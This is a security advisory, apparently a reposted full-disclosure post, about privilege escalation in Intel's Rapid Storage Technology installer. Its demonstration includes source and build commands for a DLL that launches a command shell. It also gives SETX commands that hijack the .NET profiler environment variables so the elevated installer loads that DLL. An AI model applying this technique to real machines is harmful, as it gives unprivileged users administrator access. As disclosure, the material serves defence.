Intel RST User Interface / Driver Privilege Escalation

2021.03.24
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

Hi @ll, more than 2 years ago I disclosed 2 vulnerabilities leading to local escalation of privilege in the Intel Rapid Storage Technology (Intel RST) User Interface and Driver: see <https://seclists.org/fulldisclosure/2018/Nov/45> and <https://seclists.org/fulldisclosure/2018/Nov/52> Intel fixed this vulnerability only in their executable installer. Some time later Intel rewrote or rebuilt this installer (see <https://downloadcenter.intel.com/download/29978/Intel-Rapid-Storage-Technology-Driver-Installation-Software-with-Intel-Optane-Memor y> for its current version 18.0.1.1138, published 10/15/2020) and incorporated the second vulnerability. CVSS 3.0 score: 8.2 High CVSS 3.0 vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H Demonstration: ~~~~~~~~~~~~~~ 0. Save the following source as sentinel.c in an arbitrary directory: --- sentinel.c --- // Copyright (C) 2004-2021, Stefan Kanthak <stefan.kanthak@nexgo.de> #define STRICT #define UNICODE #define WIN32_LEAN_AND_MEAN #include <windows.h> const STARTUPINFO si = {sizeof(si)}; __declspec(safebuffers) BOOL WINAPI _DllMainCRTStartup(HANDLE hModule, DWORD dwReason, CONTEXT *lpContext) { WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL"; PROCESS_INFORMATION pi; if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE, CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } return TRUE; } --- EOF --- 1. Start the command prompt of the 32-bit Windows Software Development Kit, then run the following command lines to compile sentinel.c and link it as sentinel.dll: cl.exe /Zl /W4 /O2 /GAFy /c sentinel.c link.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /RELEASE /SUBSYSTEM:Windows sentinel.obj kernel32.lib ALTERNATIVE for steps 0 and 1: 1. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL> and save it in an arbitrary directory. 2. Logon with the user account created during Windows setup. 3. Start a command prompt (unelevated!) and run the following command lines (replace <directory> with the pathname of the directory where you built or saved sentinel.dll): SETX.exe COR_ENABLE_PROFILING 1 SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A} SETX.exe COR_PROFILER_PATH <directory>\sentinel.dll JFTR: this is just one method to set these environment variables without the need to elevate! 4. Download <https://downloadmirror.intel.com/29978/eng/SetupRST.exe> and save it in an arbitrary directory. 5. Execute SetupRST.exe per double-click, acknowledge the UAC prompt, then admire the console windows showing the output of WHOAMI.exe running elevated. stay tuned, and FAR AWAY from vulnerable crap built by Intel Stefan Kanthak


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top